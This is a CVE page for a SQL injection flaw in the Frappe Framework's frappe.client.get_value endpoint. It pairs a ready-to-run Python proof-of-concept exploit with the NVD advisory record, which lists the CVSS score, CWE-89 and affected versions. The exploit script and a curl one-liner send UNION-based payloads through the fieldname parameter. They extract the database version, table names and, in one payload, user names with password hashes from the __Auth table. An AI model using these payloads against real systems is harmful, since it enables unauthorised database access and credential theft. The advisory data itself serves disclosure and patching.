CVE-2025-56380

# CVE-2025-56380 - Frappe Framework SQL Injection PoC # Vulnerable endpoint: frappe.client.get_value # Vulnerable parameter: fieldname import requests # Target configuration TARGET_URL = "http://target-frappe-site.com" API_ENDPOINT = "/api/method/frappe.client.get_value" def exploit_sql_injection(target_url, injection_payload): """ Exploit SQL injection in fieldname parameter of frappe.client.get_value """ # SQL injection payload targeting the fieldname parameter # Example: Extract database version or sensitive data params = { "doctype": "User", "fieldname": injection_payload, "filters": "[[\"name\", \"=\", \"Administrator\"]]" } try: response = requests.get( f"{target_url}{API_ENDPOINT}", params=params, timeout=10 ) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") return response.text except requests.exceptions.RequestException as e: print(f"Error: {e}") return None # Example injection payloads # Payload 1: Extract database version payload_version = "name UNION SELECT version()-- " # Payload 2: Extract table names payload_tables = "name UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE table_schema=database()-- " # Payload 3: Extract user credentials payload_users = "name UNION SELECT GROUP_CONCAT(name,':',password) FROM __Auth-- " if __name__ == "__main__": # Test the SQL injection result = exploit_sql_injection(TARGET_URL, payload_version) print(f"\nExploitation result:\n{result}") # Alternative: Direct HTTP request example # curl "http://target.com/api/method/frappe.client.get_value?doctype=User&fieldname=name UNION SELECT version()-- &filters=%5B%5B%22name%22%2C%20%22%3D%22%2C%20%22Administrator%22%5D%5D"

{"cve": {"id": "CVE-2025-56380", "sourceIdentifier": "[email protected]", "published": "2025-10-02T14:15:45.767", "lastModified": "2025-10-03T16:18:50.157", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Framework v15.72.4 was discovered to contain a SQL injection vulnerability via the fieldname parameter in the frappe.client.get_value API endpoint and a crafted script to the fieldname parameter"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:erpnext:15.67.0:*:*:*:*:*:*:*", "matchCriteriaId": "C2D1FAC2-E38C-45C7-84E3-0D82B1BE88DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:15.72.4:*:*:*:*:*:*:*", "matchCriteriaId": "76F8F843-7675-4B36-9972-1D001E2869F9"}]}]}], "references": [{"url": "https://github.com/MoAlali", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://github.com/MoAlali/CVE-2025-56380", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}